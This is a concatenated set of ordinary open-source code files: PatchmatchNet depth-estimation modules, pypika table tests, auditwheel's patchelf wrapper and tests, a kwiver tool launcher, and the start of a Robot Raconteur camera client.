        print('undefined distribution for reparam trick. quitting...')
quit()
# else:
# eps = torch.FloatTensor(std.size()).normal_()
eps = Variable(eps)
return eps.mul(std).add_(mu), std
def sample_lognormal(mean, sigma, sigma0=1.):
"""
Samples from a log-normal distribution using the reparametrization
    trick so that we can backpropagate the gradients through the sampling.
By setting sigma0=0 we make the operation deterministic (useful at testing time)
.normal() gives mean=0, std=1.
"""
eps = Variable( mean.data.new(mean.size()).normal_().type(torch.cuda.FloatTensor) )
return torch.exp(mean + sigma * sigma0 * eps )
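# --- illustrative usage, not part of the original module ---
# With sigma0=0 the sampled noise collapses to exp(mean), which is how the
# models above make the dropout deterministic at test time. This assumes a
# CUDA device, matching the hard-coded torch.cuda.FloatTensor usage.
if __name__ == '__main__':
    mean = Variable(torch.zeros(2, 3).cuda())
    sigma = Variable(0.5 * torch.ones(2, 3).cuda())
    print(sample_lognormal(mean, sigma, sigma0=0.))  # all ones: exp(0)
    print(sample_lognormal(mean, sigma, sigma0=1.))  # multiplicative log-normal noise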
``` |
{
"source": "johnwlambert/PatchmatchNet",
"score": 3
} |
#### File: PatchmatchNet/models/patchmatch.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from .module import *
import cv2
import numpy as np
class DepthInitialization(nn.Module):
def __init__(self, patchmatch_num_sample = 1):
super(DepthInitialization, self).__init__()
self.patchmatch_num_sample = patchmatch_num_sample
def forward(self, random_initialization, min_depth, max_depth, height, width, depth_interval_scale, device,
depth=None):
batch_size = min_depth.size()[0]
if random_initialization:
# first iteration of Patchmatch on stage 3, sample in the inverse depth range
# divide the range into several intervals and sample in each of them
inverse_min_depth = 1.0 / min_depth
inverse_max_depth = 1.0 / max_depth
patchmatch_num_sample = 48
# [B,Ndepth,H,W]
depth_sample = torch.rand((batch_size, patchmatch_num_sample, height, width), device=device) + \
torch.arange(0, patchmatch_num_sample, 1, device=device).view(1, patchmatch_num_sample, 1, 1)
depth_sample = inverse_max_depth.view(batch_size,1,1,1) + depth_sample / patchmatch_num_sample * \
(inverse_min_depth.view(batch_size,1,1,1) - inverse_max_depth.view(batch_size,1,1,1))
depth_sample = 1.0 / depth_sample
return depth_sample
else:
# other Patchmatch, local perturbation is performed based on previous result
# uniform samples in an inversed depth range
if self.patchmatch_num_sample == 1:
return depth.detach()
else:
inverse_min_depth = 1.0 / min_depth
inverse_max_depth = 1.0 / max_depth
depth_sample = torch.arange(-self.patchmatch_num_sample//2, self.patchmatch_num_sample//2, 1,
device=device).view(1, self.patchmatch_num_sample, 1, 1).repeat(batch_size,
1, height, width).float()
inverse_depth_interval = (inverse_min_depth - inverse_max_depth) * depth_interval_scale
inverse_depth_interval = inverse_depth_interval.view(batch_size,1,1,1)
depth_sample = 1.0 / depth.detach() + inverse_depth_interval * depth_sample
depth_clamped = []
del depth
for k in range(batch_size):
depth_clamped.append(torch.clamp(depth_sample[k], min=inverse_max_depth[k], max=inverse_min_depth[k]).unsqueeze(0))
depth_sample = 1.0 / torch.cat(depth_clamped,dim=0)
del depth_clamped
return depth_sample
class Propagation(nn.Module):
def __init__(self, neighbors = 16):
super(Propagation, self).__init__()
self.neighbors = neighbors
def forward(self, batch, height, width, depth_sample, grid, depth_min, depth_max, depth_interval_scale):
# [B,D,H,W]
num_depth = depth_sample.size()[1]
propogate_depth = depth_sample.new_empty(batch, num_depth + self.neighbors, height, width)
propogate_depth[:,0:num_depth,:,:] = depth_sample
propogate_depth_sample = F.grid_sample(depth_sample[:, num_depth // 2,:,:].unsqueeze(1),
grid,
mode='bilinear',
padding_mode='border')
del grid
propogate_depth_sample = propogate_depth_sample.view(batch, self.neighbors, height, width)
propogate_depth[:,num_depth:,:,:] = propogate_depth_sample
del propogate_depth_sample
# sort
propogate_depth, _ = torch.sort(propogate_depth, dim=1)
return propogate_depth
class Evaluation(nn.Module):
def __init__(self, G=8, stage=3, evaluate_neighbors=9, iterations=2):
super(Evaluation, self).__init__()
self.iterations = iterations
self.G = G
self.stage = stage
if self.stage == 3:
self.pixel_wise_net = PixelwiseNet(self.G)
self.similarity_net = SimilarityNet(self.G, evaluate_neighbors)
def forward(self, ref_feature, src_features, ref_proj, src_projs, depth_sample, depth_min, depth_max, iter, grid=None, weight=None, view_weights=None):
num_src_features = len(src_features)
num_src_projs = len(src_projs)
batch, feature_channel, height, width = ref_feature.size()
device = ref_feature.get_device()
num_depth = depth_sample.size()[1]
assert num_src_features == num_src_projs, "Patchmatch Evaluation: Different number of images and projection matrices"
if view_weights != None:
assert num_src_features == view_weights.size()[1], "Patchmatch Evaluation: Different number of images and view weights"
pixel_wise_weight_sum = 0
ref_feature = ref_feature.view(batch, self.G, feature_channel//self.G, height, width)
similarity_sum = 0
if self.stage == 3 and view_weights == None:
view_weights = []
for src_feature, src_proj in zip(src_features, src_projs):
warped_feature = differentiable_warping(src_feature, src_proj, ref_proj, depth_sample)
warped_feature = warped_feature.view(batch, self.G, feature_channel//self.G, num_depth, height, width)
# group-wise correlation
similarity = (warped_feature * ref_feature.unsqueeze(3)).mean(2)
# pixel-wise view weight
view_weight = self.pixel_wise_net(similarity)
view_weights.append(view_weight)
if self.training:
similarity_sum = similarity_sum + similarity * view_weight.unsqueeze(1) # [B, G, Ndepth, H, W]
pixel_wise_weight_sum = pixel_wise_weight_sum + view_weight.unsqueeze(1) #[B,1,1,H,W]
else:
similarity_sum += similarity*view_weight.unsqueeze(1)
pixel_wise_weight_sum += view_weight.unsqueeze(1)
del warped_feature, src_feature, src_proj, similarity, view_weight
del src_features, src_projs
view_weights = torch.cat(view_weights,dim=1) #[B,4,H,W], 4 is the number of source views
# aggregated matching cost across all the source views
similarity = similarity_sum.div_(pixel_wise_weight_sum)
del ref_feature, pixel_wise_weight_sum, similarity_sum
# adaptive spatial cost aggregation
score = self.similarity_net(similarity, grid, weight)
del similarity, grid, weight
# apply softmax to get probability
softmax = nn.LogSoftmax(dim=1)
score = softmax(score)
score = torch.exp(score)
# depth regression: expectation
depth_sample = torch.sum(depth_sample * score, dim = 1)
return depth_sample, score, view_weights.detach()
else:
i=0
for src_feature, src_proj in zip(src_features, src_projs):
warped_feature = differentiable_warping(src_feature, src_proj, ref_proj, depth_sample)
warped_feature = warped_feature.view(batch, self.G, feature_channel//self.G, num_depth, height, width)
similarity = (warped_feature * ref_feature.unsqueeze(3)).mean(2)
# reuse the pixel-wise view weight from first iteration of Patchmatch on stage 3
view_weight = view_weights[:,i].unsqueeze(1) #[B,1,H,W]
i=i+1
if self.training:
similarity_sum = similarity_sum + similarity * view_weight.unsqueeze(1) # [B, G, Ndepth, H, W]
pixel_wise_weight_sum = pixel_wise_weight_sum + view_weight.unsqueeze(1) #[B,1,1,H,W]
else:
similarity_sum += similarity*view_weight.unsqueeze(1)
pixel_wise_weight_sum += view_weight.unsqueeze(1)
del warped_feature, src_feature, src_proj, similarity, view_weight
del src_features, src_projs
# [B, G, Ndepth, H, W]
similarity = similarity_sum.div_(pixel_wise_weight_sum)
del ref_feature, pixel_wise_weight_sum, similarity_sum
score = self.similarity_net(similarity, grid, weight)
del similarity, grid, weight
softmax = nn.LogSoftmax(dim=1)
score = softmax(score)
score = torch.exp(score)
if self.stage == 1 and iter == self.iterations:
# depth regression: inverse depth regression
depth_index = torch.arange(0, num_depth, 1, device=device).view(1, num_depth, 1, 1)
depth_index = torch.sum(depth_index * score, dim = 1)
inverse_min_depth = 1.0 / depth_sample[:,-1,:,:]
inverse_max_depth = 1.0 / depth_sample[:,0,:,:]
depth_sample = inverse_max_depth + depth_index / (num_depth - 1) * \
(inverse_min_depth - inverse_max_depth)
depth_sample = 1.0 / depth_sample
return depth_sample, score
# depth regression: expectation
else:
depth_sample = torch.sum(depth_sample * score, dim = 1)
return depth_sample, score
class PatchMatch(nn.Module):
def __init__(self, random_initialization = False, propagation_out_range = 2,
patchmatch_iteration = 2, patchmatch_num_sample = 16, patchmatch_interval_scale = 0.025,
num_feature = 64, G = 8, propagate_neighbors = 16, stage=3, evaluate_neighbors=9):
super(PatchMatch, self).__init__()
self.random_initialization = random_initialization
self.depth_initialization = DepthInitialization(patchmatch_num_sample)
self.propagation_out_range = propagation_out_range
self.propagation = Propagation(propagate_neighbors)
self.patchmatch_iteration = patchmatch_iteration
self.patchmatch_interval_scale = patchmatch_interval_scale
self.propa_num_feature = num_feature
# group wise correlation
self.G = G
self.stage = stage
self.dilation = propagation_out_range
self.propagate_neighbors = propagate_neighbors
self.evaluate_neighbors = evaluate_neighbors
self.evaluation = Evaluation(self.G, self.stage, self.evaluate_neighbors, self.patchmatch_iteration)
# adaptive propagation
if self.propagate_neighbors > 0:
# last iteration on stage 1 does not have propagation (photometric consistency filtering)
if not (self.stage == 1 and self.patchmatch_iteration == 1):
self.propa_conv = nn.Conv2d(
self.propa_num_feature,
2 * self.propagate_neighbors,
kernel_size=3,
stride=1,
padding=self.dilation,
dilation=self.dilation,
bias=True)
nn.init.constant_(self.propa_conv.weight, 0.)
nn.init.constant_(self.propa_conv.bias, 0.)
# adaptive spatial cost aggregation (adaptive evaluation)
self.eval_conv = nn.Conv2d(self.propa_num_feature, 2 * self.evaluate_neighbors, kernel_size=3, stride=1,
padding=self.dilation, dilation=self.dilation, bias=True)
nn.init.constant_(self.eval_conv.weight, 0.)
nn.init.constant_(self.eval_conv.bias, 0.)
self.feature_weight_net = FeatureWeightNet(num_feature, self.evaluate_neighbors, self.G)
# compute the offset for adaptive propagation
def get_propagation_grid(self, batch, height, width, offset, device, img=None):
if self.propagate_neighbors == 4:
original_offset = [ [-self.dilation, 0],
[0, -self.dilation], [0, self.dilation],
[self.dilation, 0]]
elif self.propagate_neighbors == 8:
original_offset = [[-self.dilation, -self.dilation], [-self.dilation, 0], [-self.dilation, self.dilation],
[0, -self.dilation], [0, self.dilation],
[self.dilation, -self.dilation], [self.dilation, 0], [self.dilation, self.dilation]]
elif self.propagate_neighbors == 16:
original_offset = [[-self.dilation, -self.dilation], [-self.dilation, 0], [-self.dilation, self.dilation],
[0, -self.dilation], [0, self.dilation],
[self.dilation, -self.dilation], [self.dilation, 0], [self.dilation, self.dilation]]
for i in range(len(original_offset)):
offset_x, offset_y = original_offset[i]
original_offset.append([2*offset_x, 2*offset_y])
else:
raise NotImplementedError
with torch.no_grad():
y_grid, x_grid = torch.meshgrid([torch.arange(0, height, dtype=torch.float32, device=device),
torch.arange(0, width, dtype=torch.float32, device=device)])
y_grid, x_grid = y_grid.contiguous(), x_grid.contiguous()
y_grid, x_grid = y_grid.view(height * width), x_grid.view(height * width)
xy = torch.stack((x_grid, y_grid)) # [2, H*W]
xy = torch.unsqueeze(xy, 0).repeat(batch, 1, 1) # [B, 2, H*W]
xy_list=[]
for i in range(len(original_offset)):
original_offset_y, original_offset_x = original_offset[i]
offset_x = original_offset_x + offset[:,2*i,:].unsqueeze(1)
offset_y = original_offset_y + offset[:,2*i+1,:].unsqueeze(1)
xy_list.append((xy+torch.cat((offset_x, offset_y), dim=1)).unsqueeze(2))
xy = torch.cat(xy_list, dim=2) # [B, 2, 9, H*W]
del xy_list, x_grid, y_grid
x_normalized = xy[:, 0, :, :] / ((width - 1) / 2) - 1
y_normalized = xy[:, 1, :, :] / ((height - 1) / 2) - 1
del xy
grid = torch.stack((x_normalized, y_normalized), dim=3) # [B, 9, H*W, 2]
del x_normalized, y_normalized
grid = grid.view(batch, self.propagate_neighbors * height, width, 2)
return grid
    # compute the offsets for adaptive spatial cost aggregation in adaptive evaluation
def get_evaluation_grid(self, batch, height, width, offset, device, img=None):
if self.evaluate_neighbors==9:
dilation = self.dilation-1 #dilation of evaluation is a little smaller than propagation
original_offset = [[-dilation, -dilation], [-dilation, 0], [-dilation, dilation],
[0, -dilation], [0, 0], [0, dilation],
[dilation, -dilation], [dilation, 0], [dilation, dilation]]
elif self.evaluate_neighbors==17:
dilation = self.dilation-1
original_offset = [[-dilation, -dilation], [-dilation, 0], [-dilation, dilation],
[0, -dilation], [0, 0], [0, dilation],
[dilation, -dilation], [dilation, 0], [dilation, dilation]]
for i in range(len(original_offset)):
offset_x, offset_y = original_offset[i]
if offset_x != 0 or offset_y !=0:
original_offset.append([2*offset_x, 2*offset_y])
else:
raise NotImplementedError
with torch.no_grad():
y_grid, x_grid = torch.meshgrid([torch.arange(0, height, dtype=torch.float32, device=device),
torch.arange(0, width, dtype=torch.float32, device=device)])
y_grid, x_grid = y_grid.contiguous(), x_grid.contiguous()
y_grid, x_grid = y_grid.view(height * width), x_grid.view(height * width)
xy = torch.stack((x_grid, y_grid)) # [2, H*W]
xy = torch.unsqueeze(xy, 0).repeat(batch, 1, 1) # [B, 2, H*W]
xy_list=[]
for i in range(len(original_offset)):
original_offset_y, original_offset_x = original_offset[i]
offset_x = original_offset_x + offset[:,2*i,:].unsqueeze(1)
offset_y = original_offset_y + offset[:,2*i+1,:].unsqueeze(1)
xy_list.append((xy+torch.cat((offset_x, offset_y), dim=1)).unsqueeze(2))
xy = torch.cat(xy_list, dim=2) # [B, 2, 9, H*W]
del xy_list, x_grid, y_grid
x_normalized = xy[:, 0, :, :] / ((width - 1) / 2) - 1
y_normalized = xy[:, 1, :, :] / ((height - 1) / 2) - 1
del xy
grid = torch.stack((x_normalized, y_normalized), dim=3) # [B, 9, H*W, 2]
del x_normalized, y_normalized
grid = grid.view(batch, len(original_offset) * height, width, 2)
return grid
def forward(self, ref_feature, src_features, ref_proj, src_projs, depth_min, depth_max,
depth = None, img = None, view_weights = None):
depth_samples = []
device = ref_feature.get_device()
batch, _, height, width = ref_feature.size()
# the learned additional 2D offsets for adaptive propagation
if self.propagate_neighbors > 0:
# last iteration on stage 1 does not have propagation (photometric consistency filtering)
if not (self.stage == 1 and self.patchmatch_iteration == 1):
propa_offset = self.propa_conv(ref_feature)
propa_offset = propa_offset.view(batch, 2 * self.propagate_neighbors, height*width)
propa_grid = self.get_propagation_grid(batch,height,width,propa_offset,device,img)
# the learned additional 2D offsets for adaptive spatial cost aggregation (adaptive evaluation)
eval_offset = self.eval_conv(ref_feature)
eval_offset = eval_offset.view(batch, 2 * self.evaluate_neighbors, height*width)
eval_grid = self.get_evaluation_grid(batch,height,width,eval_offset,device,img)
feature_weight = self.feature_weight_net(ref_feature.detach(), eval_grid)
# first iteration of Patchmatch
iter = 1
if self.random_initialization:
# first iteration on stage 3, random initialization, no adaptive propagation
depth_sample = self.depth_initialization(True, depth_min, depth_max, height, width,
self.patchmatch_interval_scale, device)
# weights for adaptive spatial cost aggregation in adaptive evaluation
weight = depth_weight(depth_sample.detach(), depth_min, depth_max, eval_grid.detach(), self.patchmatch_interval_scale,
self.evaluate_neighbors)
weight = weight * feature_weight.unsqueeze(1)
weight = weight / torch.sum(weight, dim=2).unsqueeze(2)
# evaluation, outputs regressed depth map and pixel-wise view weights which will
# be used for subsequent iterations
depth_sample, score, view_weights = self.evaluation(ref_feature, src_features, ref_proj, src_projs,
depth_sample, depth_min, depth_max, iter, eval_grid, weight, view_weights)
depth_sample = depth_sample.unsqueeze(1)
depth_samples.append(depth_sample)
else:
# subsequent iterations, local perturbation based on previous result
depth_sample = self.depth_initialization(False, depth_min, depth_max,
height, width, self.patchmatch_interval_scale, device, depth)
del depth
# adaptive propagation
if self.propagate_neighbors > 0:
# last iteration on stage 1 does not have propagation (photometric consistency filtering)
if not (self.stage == 1 and iter == self.patchmatch_iteration):
depth_sample = self.propagation(batch, height, width, depth_sample, propa_grid, depth_min, depth_max,
self.patchmatch_interval_scale)
# weights for adaptive spatial cost aggregation in adaptive evaluation
weight = depth_weight(depth_sample.detach(), depth_min, depth_max, eval_grid.detach(), self.patchmatch_interval_scale,
self.evaluate_neighbors)
weight = weight * feature_weight.unsqueeze(1)
weight = weight / torch.sum(weight, dim=2).unsqueeze(2)
# evaluation, outputs regressed depth map
depth_sample, score = self.evaluation(ref_feature, src_features, ref_proj, src_projs,
depth_sample, depth_min, depth_max, iter, eval_grid, weight, view_weights)
depth_sample = depth_sample.unsqueeze(1)
depth_samples.append(depth_sample)
for iter in range(2, self.patchmatch_iteration+1):
# local perturbation based on previous result
depth_sample = self.depth_initialization(False, depth_min, depth_max, height, width, self.patchmatch_interval_scale, device, depth_sample)
# adaptive propagation
if self.propagate_neighbors > 0:
# last iteration on stage 1 does not have propagation (photometric consistency filtering)
if not (self.stage == 1 and iter == self.patchmatch_iteration):
depth_sample = self.propagation(batch, height, width, depth_sample, propa_grid, depth_min, depth_max,
self.patchmatch_interval_scale)
# weights for adaptive spatial cost aggregation in adaptive evaluation
weight = depth_weight(depth_sample.detach(), depth_min, depth_max, eval_grid.detach(), self.patchmatch_interval_scale,
self.evaluate_neighbors)
weight = weight * feature_weight.unsqueeze(1)
weight = weight / torch.sum(weight, dim=2).unsqueeze(2)
# evaluation, outputs regressed depth map
depth_sample, score = self.evaluation(ref_feature, src_features,
ref_proj, src_projs, depth_sample, depth_min, depth_max, iter, eval_grid, weight, view_weights)
depth_sample = depth_sample.unsqueeze(1)
depth_samples.append(depth_sample)
return depth_samples, score, view_weights
# first, do convolution on aggregated cost among all the source views
# second, perform adaptive spatial cost aggregation to get final cost
class SimilarityNet(nn.Module):
def __init__(self, G, neighbors = 9):
super(SimilarityNet, self).__init__()
self.neighbors = neighbors
self.conv0 = ConvBnReLU3D(G, 16, 1, 1, 0)
self.conv1 = ConvBnReLU3D(16, 8, 1, 1, 0)
self.similarity = nn.Conv3d(8, 1, kernel_size=1, stride=1, padding=0)
def forward(self, x1, grid, weight):
# x1: [B, G, Ndepth, H, W], aggregated cost among all the source views with pixel-wise view weight
# grid: position of sampling points in adaptive spatial cost aggregation
# weight: weight of sampling points in adaptive spatial cost aggregation, combination of
# feature weight and depth weight
batch,G,num_depth,height,width = x1.size()
x1 = self.similarity(self.conv1(self.conv0(x1))).squeeze(1)
x1 = F.grid_sample(x1,
grid,
mode='bilinear',
padding_mode='border')
# [B,Ndepth,9,H,W]
x1 = x1.view(batch, num_depth, self.neighbors, height, width)
return torch.sum(x1*weight, dim=2)
# adaptive spatial cost aggregation
# weight based on similarity of features of sampling points and center pixel
class FeatureWeightNet(nn.Module):
def __init__(self, num_feature, neighbors=9, G=8):
super(FeatureWeightNet, self).__init__()
self.neighbors = neighbors
self.G = G
self.conv0 = ConvBnReLU3D(G, 16, 1, 1, 0)
self.conv1 = ConvBnReLU3D(16, 8, 1, 1, 0)
self.similarity = nn.Conv3d(8, 1, kernel_size=1, stride=1, padding=0)
self.output = nn.Sigmoid()
def forward(self, ref_feature, grid):
# ref_feature: reference feature map
# grid: position of sampling points in adaptive spatial cost aggregation
batch,feature_channel,height,width = ref_feature.size()
x = F.grid_sample(ref_feature,
grid,
mode='bilinear',
padding_mode='border')
# [B,G,C//G,H,W]
ref_feature = ref_feature.view(batch, self.G, feature_channel//self.G, height, width)
x = x.view(batch, self.G, feature_channel//self.G, self.neighbors, height, width)
# [B,G,Neighbor,H,W]
x = (x * ref_feature.unsqueeze(3)).mean(2)
del ref_feature
# [B,Neighbor,H,W]
x = self.similarity(self.conv1(self.conv0(x))).squeeze(1)
return self.output(x)
# adaptive spatial cost aggregation
# weight based on depth difference of sampling points and center pixel
def depth_weight(depth_sample, depth_min, depth_max, grid, patchmatch_interval_scale, evaluate_neighbors):
# grid: position of sampling points in adaptive spatial cost aggregation
neighbors = evaluate_neighbors
batch,num_depth,height,width = depth_sample.size()
# normalization
x = 1.0 / depth_sample
del depth_sample
inverse_depth_min = 1.0 / depth_min
inverse_depth_max = 1.0 / depth_max
x = (x-inverse_depth_max.view(batch,1,1,1))/(inverse_depth_min.view(batch,1,1,1)\
-inverse_depth_max.view(batch,1,1,1))
x1 = F.grid_sample(x,
grid,
mode='bilinear',
padding_mode='border')
del grid
x1 = x1.view(batch, num_depth, neighbors, height, width)
# [B,Ndepth,N_neighbors,H,W]
x1 = torch.abs(x1 - x.unsqueeze(2)) / patchmatch_interval_scale
del x
x1 = torch.clamp(x1, min=0, max=4)
# sigmoid output approximate to 1 when x=4
x1 = (-x1 + 2) * 2
output = nn.Sigmoid()
x1 = output(x1)
return x1.detach()
# estimate pixel-wise view weight
class PixelwiseNet(nn.Module):
def __init__(self, G):
super(PixelwiseNet, self).__init__()
self.conv0 = ConvBnReLU3D(G, 16, 1, 1, 0)
self.conv1 = ConvBnReLU3D(16, 8, 1, 1, 0)
self.conv2 = nn.Conv3d(8, 1, kernel_size=1, stride=1, padding=0)
self.output = nn.Sigmoid()
def forward(self, x1):
# x1: [B, G, Ndepth, H, W]
# [B, Ndepth, H, W]
x1 =self.conv2(self.conv1(self.conv0(x1))).squeeze(1)
output = self.output(x1)
del x1
# [B,H,W]
output = torch.max(output, dim=1)[0]
return output.unsqueeze(1)
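# --- illustrative shape check, not part of the original module ---
# PixelwiseNet maps a group-wise correlation volume [B, G, Ndepth, H, W] to a
# per-pixel view weight [B, 1, H, W]; the sizes below are arbitrary. Because of
# the relative import above, run it as a module (e.g. `python -m models.patchmatch`).
if __name__ == '__main__':
    net = PixelwiseNet(G=8)
    corr = torch.rand(1, 8, 16, 32, 40)  # B=1, G=8, Ndepth=16, H=32, W=40
    print(net(corr).shape)  # torch.Size([1, 1, 32, 40])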
``` |
{
"source": "johnwmcarneiro/pypika",
"score": 3
} |
#### File: pypika/tests/test_tables.py
```python
import unittest
from pypika import (
Schema,
Table,
Tables
)
__author__ = "<NAME>"
__email__ = "<EMAIL>"
class TableEqualityTests(unittest.TestCase):
def test_tables_equal_by_name(self):
t1 = Table("t")
t2 = Table("t")
self.assertEqual(t1, t2)
def test_tables_equal_by_schema_and_name(self):
t1 = Table("t", schema='a')
t2 = Table("t", schema='a')
self.assertEqual(t1, t2)
def test_tables_equal_by_schema_and_name_using_schema(self):
a = Schema('a')
t1 = Table("t", schema=a)
t2 = Table("t", schema=a)
self.assertEqual(t1, t2)
def test_tables_equal_by_schema_and_name_using_schema_with_parent(self):
parent = Schema('parent')
a = Schema('a', parent=parent)
t1 = Table("t", schema=a)
t2 = Table("t", schema=a)
self.assertEqual(t1, t2)
def test_tables_not_equal_by_schema_and_name_using_schema_with_different_parents(self):
parent = Schema('parent')
a = Schema('a', parent=parent)
t1 = Table("t", schema=a)
t2 = Table("t", schema=Schema('a'))
self.assertNotEqual(t1, t2)
def test_tables_not_equal_with_different_schemas(self):
t1 = Table("t", schema='a')
t2 = Table("t", schema='b')
self.assertNotEqual(t1, t2)
def test_tables_not_equal_with_different_names(self):
t1 = Table("t", schema='a')
t2 = Table("q", schema='a')
self.assertNotEqual(t1, t2)
def test_many_tables_with_alias(self):
tables_data = [('table1', 't1'), ('table2', 't2'), ('table3', 't3')]
tables = Tables(*tables_data)
for el in tables:
self.assertIsNotNone(el.alias)
def test_many_tables_without_alias(self):
tables_data = ['table1', 'table2', 'table3']
tables = Tables(*tables_data)
for el in tables:
self.assertIsNone(el.alias)
def test_many_tables_with_or_not_alias(self):
tables_data = [('table1', 't1'), ('table2'), 'table3']
tables = Tables(*tables_data)
for i in range(len(tables)):
if isinstance(tables_data[i], tuple):
self.assertIsNotNone(tables[i].alias)
else:
self.assertIsNone(tables[i].alias)
``` |
{
"source": "johnwparent/auditwheel",
"score": 2
} |
#### File: auditwheel/auditwheel/patcher.py
```python
import re
from distutils.spawn import find_executable
from subprocess import check_call, check_output, CalledProcessError
class ElfPatcher:
def replace_needed(self,
file_name: str,
so_name: str,
new_so_name: str) -> None:
raise NotImplementedError
def set_soname(self,
file_name: str,
new_so_name: str) -> None:
raise NotImplementedError
def set_rpath(self,
file_name: str,
rpath: str) -> None:
raise NotImplementedError
def get_rpath(self,
file_name: str) -> str:
raise NotImplementedError
def _verify_patchelf() -> None:
"""This function looks for the ``patchelf`` external binary in the PATH,
checks for the required version, and throws an exception if a proper
    version can't be found. Otherwise, silence is golden
"""
if not find_executable('patchelf'):
raise ValueError('Cannot find required utility `patchelf` in PATH')
try:
version = check_output(['patchelf', '--version']).decode("utf-8")
except CalledProcessError:
raise ValueError('Could not call `patchelf` binary')
m = re.match(r'patchelf\s+(\d+(.\d+)?)', version)
if m and tuple(int(x) for x in m.group(1).split('.')) >= (0, 9):
return
raise ValueError(('patchelf %s found. auditwheel repair requires '
'patchelf >= 0.9.') %
version)
class Patchelf(ElfPatcher):
def __init__(self) -> None:
_verify_patchelf()
def replace_needed(self,
file_name: str,
so_name: str,
new_so_name: str) -> None:
check_call(['patchelf', '--replace-needed', so_name, new_so_name,
file_name])
def set_soname(self,
file_name: str,
new_so_name: str) -> None:
check_call(['patchelf', '--set-soname', new_so_name, file_name])
def set_rpath(self,
file_name: str,
rpath: str) -> None:
check_call(['patchelf', '--remove-rpath', file_name])
check_call(['patchelf', '--force-rpath', '--set-rpath',
rpath, file_name])
def get_rpath(self,
file_name: str) -> str:
return check_output(['patchelf', '--print-rpath',
file_name]).decode('utf-8').strip()
```
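A hedged usage sketch for the `Patchelf` wrapper above; the shared-library name and rpath values are illustrative, and the `patchelf` binary (>= 0.9) must be on `PATH`.
```python
from auditwheel.patcher import Patchelf

patcher = Patchelf()  # raises ValueError if patchelf is missing or too old
print(patcher.get_rpath("mylib.so"))  # e.g. '$ORIGIN/../some_pkg.libs'
patcher.set_rpath("mylib.so", "$ORIGIN/.libs")
patcher.replace_needed("mylib.so", "libfoo.so.1", "libfoo-deadbeef.so.1")
```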
#### File: tests/integration/test_bundled_wheels.py
```python
import platform
from pathlib import Path
import pytest
from auditwheel.wheel_abi import analyze_wheel_abi
HERE = Path(__file__).parent.resolve()
@pytest.mark.skipif(platform.machine() != 'x86_64', reason='only supported on x86_64')
@pytest.mark.parametrize('file, external_libs', [
('cffi-1.5.0-cp27-none-linux_x86_64.whl', {'libffi.so.5'}),
('python_snappy-0.5.2-pp260-pypy_41-linux_x86_64.whl', {'libsnappy.so.1'}),
])
def test_analyze_wheel_abi(file, external_libs):
winfo = analyze_wheel_abi(str(HERE / file))
assert set(winfo.external_refs['manylinux_2_5_x86_64']['libs']) == external_libs
@pytest.mark.skipif(platform.machine() != 'x86_64', reason='only supported on x86_64')
def test_analyze_wheel_abi_pyfpe():
winfo = analyze_wheel_abi(str(HERE / 'fpewheel-0.0.0-cp35-cp35m-linux_x86_64.whl'))
assert winfo.sym_tag == 'manylinux_2_5_x86_64' # for external symbols, it could get manylinux1
assert winfo.pyfpe_tag == 'linux_x86_64' # but for having the pyfpe reference, it gets just linux
``` |
{
"source": "johnwparent/kwiver",
"score": 2
} |
#### File: python/kwiver/kwiver_tools.py
```python
import os
import subprocess
import kwiver
import sys
from pkg_resources import iter_entry_points
from typing import Dict, List
from kwiver.vital import vital_logging
from kwiver.vital.util.initial_plugin_path import get_initial_plugin_path
KWIVER_BIN_DIR = os.path.join(os.path.dirname(os.path.abspath(kwiver.__file__)), 'bin')
KWIVER_SUPPORTED_TOOLS = ['kwiver', 'plugin_explorer']
logger = vital_logging.getLogger(__name__)
def _setup_environment() -> Dict:
"""
Create a dictionary with environment variables for running kwiver tools.
The dictionary includes appending LD_LIBRARY_PATH, adding path to vital
logging factory to VITAL_LOGGER_FACTORY, and path to default plugins in
KWIVER_PLUGIN_PATH.
Returns:
Dictionary with environment variables used for running tools
"""
# Add additional ld libraries
ld_library_paths = []
for entry_point in iter_entry_points('kwiver.env.ld_library_path'):
ld_library_path = entry_point.load()()
if not os.path.exists(ld_library_path):
logger.warn(f"Invalid path {ld_library_path} specified in {entry_point.name}")
else:
ld_library_paths.append(ld_library_path)
ld_library_path_str = ":".join(ld_library_paths)
# Add logger factories
vital_logger_factory = None
for entry_point in iter_entry_points('kwiver.env.logger_factory', name='vital_log4cplus_logger_factory'):
logger_factory = entry_point.load()()
vital_logger_factory = logger_factory
# Check if LD_LIBRARY_PATH is set to something and append it to the current ld library path
if os.environ.get('LD_LIBRARY_PATH'):
ld_library_path_str += os.environ.get('LD_LIBRARY_PATH')
tool_environment = {
"LD_LIBRARY_PATH": ld_library_path_str,
"VITAL_LOGGER_FACTORY": vital_logger_factory,
"KWIVER_PLUGIN_PATH": get_initial_plugin_path()
}
# Add the remaining environment variables without fiddling with what we have already set
for env_var_name, env_var_val in os.environ.items():
if env_var_name not in tool_environment.keys():
tool_environment[env_var_name] = env_var_val
return tool_environment
def _kwiver_tools(tool_name: str, args: List[str]) -> int:
"""
Configure logging, setup environment and run a subprocess with kwiver tool in it.
Args:
tool_name: Name of the tool that would be run as a subprocess
args: Command line argument provided by the user for the tool
Return:
Return code for the subprocess that runs the tool
"""
vital_logging._configure_logging()
assert tool_name in KWIVER_SUPPORTED_TOOLS, f"Unsupported tool {tool_name} specified"
tool_environment = _setup_environment()
tool_path = os.path.join(KWIVER_BIN_DIR, tool_name)
assert os.path.exists(tool_path), f"Tool {tool_name} not available in {tool_path}"
args.insert(0, tool_path)
subprocess_complete = subprocess.run(args, shell=False, check=False, env=tool_environment)
return subprocess_complete.returncode
def plugin_explorer() -> None:
"""
Console script function for plugin_explorer.
"""
cmd_args = ["--skip-relative"]
cmd_args.extend(sys.argv[1:])
raise SystemExit(_kwiver_tools("plugin_explorer", cmd_args))
def kwiver() -> None:
"""
Console script function for kwiver runner.
"""
raise SystemExit(_kwiver_tools("kwiver", sys.argv[1:]))
``` |
{
"source": "johnwparent/rr_awsdeepracer",
"score": 3
} |
#### File: rr_awsdeepracer/clients/cameraTestClient.py
```python
from RobotRaconteur.Client import *
import time
import numpy as np
import cv2
import sys
import threading
from cv_bridge import CvBridge, CvBridgeError
from camera_calibration import CameraCalibration
def WebcamImageToMat(image):
frame2=image.data.reshape([image.height, image.width, 3], order='C')
return frame2
if __name__ == '__main__':
url = 'rr+tcp://localhost:'+sys.argv[1]+'?service=AWSCamera'
print(url)
cam_ctrl = RRN.ConnectService(url)
cam_ctrl.startCamera()
raw_input("Press_enter_to_capture_image: ")
im = cam_ctrl.getCurrentImage()
